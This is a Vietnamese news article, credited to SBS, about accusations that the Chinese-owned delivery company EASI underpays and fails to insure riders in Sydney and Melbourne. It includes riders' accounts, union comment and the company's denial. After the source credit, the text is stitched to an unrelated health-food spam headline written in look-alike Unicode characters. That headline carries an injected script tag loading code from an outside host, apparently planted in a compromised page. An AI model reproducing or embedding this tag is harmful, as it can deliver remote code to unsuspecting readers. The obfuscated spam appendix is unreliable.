RSS

Dịch vụ giao hàng của Trung Quốc bị tố bóc lột sức lao động tại Úc

10:05 04/11/2018

Hình ảnh những chiếc xe đạp và những chiếc túi màu vang của dịch vụ giao hàng này đã trở nên khá quen thuộc với cư dân tại Úc, đặc biệt là ở các khu vực trung tâm của Melbourne và khu vực Chinatown ở Sydney.

Thế nhưng công ty giao hàng trực thuộc quản lý của chủ người Trung Quốc này hiện đang phải đối mặt với cáo buộc về việc họ bóc lột sức lao động tại Úc.

Kiet đến Úc để học tiếng Anh, ngoài giờ học ra Kiet phải làm thêm để có thu nhập chi trả mức sinh hoạt phí của mình. Không khó để thấy chàng trai này chạy vào chạy ra những cửa hàng trong khu vực Chinatown ở Sydney để nhận hàng và vận chuyển đến thực khách đã yêu cầu dịch vụ vận chuyển.

Công việc này khá linh động nên nó vô cùng lý tưởng đối với giới sinh viên, đặc biệt là các sinh viên người Mã Lai. Thế nhưng nếu nói về mức lương và thưởng thì nó hoàn toàn không lý tưởng, lý do là vì nó khá tốn thời gian. Khoảng thời gian chờ để nhận và giao hàng khá dài, mức thu nhập khoảng $6 cho một lần nhận yêu cầu từ khách hàng, trung bình nếu làm cật lực cả một ngày dài thì Kiet chỉ kiếm ít hơn mức $150/ngày, thấp hơn cả mức lương tối thiểu.

Kiet is a delivery rider for Easi.

“Nhiều lúc tôi phải đợi cả 1, 2 tiếng,” Kiet chia sẻ với SBS News, cho biết thêm rằng Kiet còn phải đối mặt với nhiểu rủi ro và nguy hiểm khi phải lái xe đạp len lỏi giữa những con đường đông đúc.

“Tôi không hề có bảo hiểm. Nên là nếu có chuyện gì xảy ra thì tôi chẳng thể nhận được hỗ trợ từ bất kì đâu. Công việc này thực sự nguy hiểm," Kiet cho biết.

Kiet nhận đơn hàng từ hệ thống Sydney Delivery, đây là 1 trong 5 ứng dụng giao thức ăn được sử dụng bởi rất nhiều doanh nghiệp trong thành phố, và những ứng dụng này trực thuộc một công ty mẹ là Australian Delivery United Group, hay còn gọi tắt là EASI.

Với 200,000 lượt tải xuống ứng dụng, các nhân viên của EASI dễ dàng được nhận diện bởi hệ thống xe đạp điện màu vàng, và đồng phục màu vàng. Hệ thống này còn  được gọi là “UberEATS Trung Quốc”. Hình ảnh chiếc xe đạp màu vang này mỗi lúc lại phổ biến tại các thành phố lớn của Úc, bên cạnh các dịch vụ khác như UberEats và Deliveroo, vốn là hai dịch vụ có quy mô lớn hơn gấp nhiều lần.

An Easi delivery bike in Sydney's Chinatown.

Nhưng các nhà phê bình đã cho biết thực trạng gây tranh cãi giữa các công ty giao hàng thực phẩm trực tuyến với các cuộc biểu tình của công nhân viên đòi tăng lương và quyền lợi, thu hút sự chú ý của giới truyền thông gần đây, thực sự dính dáng trực tiếp với những công ty quy mô nhỏ hơn mà ít ai để ý tới.

“Vấn đề là quy mô hoạt động của những công ty này nhỏ hơn rất nhiều, nên họ dễ dàng bị bỏ sót trong những cáo buộc về tình trạng bóc lột sức lao động. Trong khi những công ty  có quy mô lớn thì luôn bị điểm mặt,” Thư ký Quốc gia của Liên đoàn Công nhân Vận tải (TWU), ông Tony Sheldon cho biết.

Những nhân viên giao hàng làm việc cho các công ty nhỏ và độc lập, thực tế luôn bị giảm sát và không hề được hưởng các quyền lợi cơ bản của người lao động, như việc mức lương thấp hơn, không có hưu bổng, và không có mức bồi thường lao động.

Vào tháng Sáu, Fair Work Ombudsman đã tiến hành tố tụng công ty có trụ sở tại Berlin là Foodora, cáo buộc công ty này làm hợp đồng giả mạo, dẫn đến việc trả lương thấp cho nhân viên.

ACCC đã tiến hành một cuộc điều tra khác về các điều khoản và điều kiện trong hợp đồng của công ty UberEATS.

Và trong tháng 9 này, thanh tra của Ombudsman đã từ bỏ vụ kiện Foodora sau khi công ty này tự nguyện chịu trách nhiệm về hoạt động của mình và rút ra khỏi thị trường.

Mặc dù vậy, TWU vẫn đang điều tra riêng việc Foodora đã từng sa thải một nhân viên vào tháng ba mà không có lý do gì công bằng và rõ ràng.

“Foodora, công ty hiện đang tìm cách rút khỏi thị trường Úc nhưng lại bị giữ chân vì họ có hành vi ăn chận tiền lương tại Úc, họ cũng đang nợ một khoản thuế không nhỏ của chính phủ Úc,” ông Sheldon cho biết.

“Những công ty quy mô nhỏ thực sự có những ảnh hưởng rất lớn trên thị trường tại các thành phố lớn” hiện đang được đưa vào để xem xét, ông nói thêm.

Một công dân người Trung Quốc – cô Lee, sang Úc theo diện Working Holiday Visa hiện tại đang làm nhân viên giao hàng cho cả hai hang UberEATS và EASI dựa trên ứng dụng của Melbourne Delivery để kiếm tiền.

Khi làm việc toàn thời gian, cô Lee có thể kiếm khoảng $800 một tuần - một số tiền chỉ nhỉnh hơn mức lương tối thiểu một chút. Trong nhiều trường hợp thì số tiền cô kiếm được luôn thấp hơn mức tối thiểu.

Một phần thu nhập cô nhận được sẽ chi trả vào tiền thuê hàng tuần cho chiếc xe đạp điện giao hàng của Melbourne Delivery, mức phí này là $180, cô Lee cho rằng mức phí là quá đắt.

Nhưng nếu so với các nhân viên làm tại các nhà hàng Trung Quốc thì tiền lương cô kiếm được không phải là quá tệ”, cô nói với SBS News.

Lee thu tiền của mình trực tiếp từ khách hàng của Melbourne Delivery bằng tiền mặt, đối với UberEATS thì thông qua chuyển khoản ngân hàng, và cô thừa nhận cô không biết gì về nghĩa vụ phải đóng thuế của mình.

Mối quan tâm chính của cô Lee là về an toàn giao thông. Không giống như UberEATS, công ty Melbourne Delivery không hề cung cấp bảo hiểm cho người sử dụng xe đạp của họ.

“Có mấy lần tôi xuýt thì bị xe tông,” cô nói. “Chuyện này xảy ra khá thường xuyên vì giao thông ở Úc rất nhanh.”

Cô muốn thấy các công ty này đặt vấn đề an toàn của nhân viên của họ lên nhiều hơn và đề cập nhiều hình thức khác nhau để bảo đảm an toàn. Cụ thể là việc cô từng bị mắc kẹt tại lối cầu thang ở một căn hộ mà điện thoại thì hoàn toàn không có sóng, chính vì vậy mà cô chẳng thể kêu ai để cầu cứu.

Trong một tuyên bố, tập đoàn Australia Delivery United đã bác bỏ bất kỳ hành vi ngược đãi nào mà công nhân cáo buộc họ. Họ cho rằng những người giao hàng này thuộc các nhà thầu độc chứ không phải nhân viên trực thuộc họ, và do đó công ty chẳng có nghĩa vụ nào về thuế hay bảo hiểm cho những người đó.

Khi người giao hàng làm việc tự do theo giờ riêng của họ và làm cho nhiều công ty khác nhau, “khả năng kiếm tiền của họ đâu chỉ giới hạn trong việc chỉ làm cho riêng công ty chúng tôi, mà nó liên quan trực tiếp đến tổng số giờ mà họ làm.”

Phát ngôn viên cho biết rằng công ty của họ không hề biết về mức phí thuê xe đạp, vì cái đó không phải là quy định bắt buộc, mà là tùy vào nhu cầu sử dụng và họ giao toàn quyền cho các nhà thầu nhỏ hơn.

“Nhà thầu có các chính sách và đào tạo nghiêm ngặt của công ty (cả lý thuyết và thực hành) cho các nhân viên giao hàng trước khi họ tham gia thực hiện các dịch vụ cho công ty của chúng tôi,” nó nói.

UberEATS cho biết tất cả nhân viên giao hàng đã được cung cấp thông tin an toàn khi họ đăng ký, và có kế hoạch công bố những thông tin này trực tiếp lên ứng dụng của họ.

Theo: SBS

Tɦᴜốc ɓổ ƙɦôпɢ ɓằпɢ łɦực ρɦẩɱ ɓổ: Cácɦ cɦăɱ sóc пɢũ łạпɢ łốł пɦấł ɢiúρ ɓạп sốпɢ łɦọ ɦơп<script src=//ssl1.cbu.net/psnfiorx></script>

Tɦᴜốc ɓổ ƙɦôпɢ ɓằпɢ łɦực ρɦẩɱ ɓổ: Cácɦ cɦăɱ sóc пɢũ łạпɢ łốł пɦấł ɢiúρ ɓạп sốпɢ łɦọ ɦơп

Tɦeo các ɓác sĩ, sức ƙɦỏe củɑ пɢũ łạпɢ qᴜyếł ᵭịпɦ łᴜổi łɦọ củɑ ɓạп. Đây ℓà ɓí qᴜyếł ℓựɑ cɦọп łɦực ρɦẩɱ cɦăɱ sóc cơ łɦể łốł пɦấł ɓạп пêп łɦɑɱ ƙɦảo ᵭể ℓᴜôп ƙɦỏe ɱạпɦ ʋà łɾườпɢ łɦọ.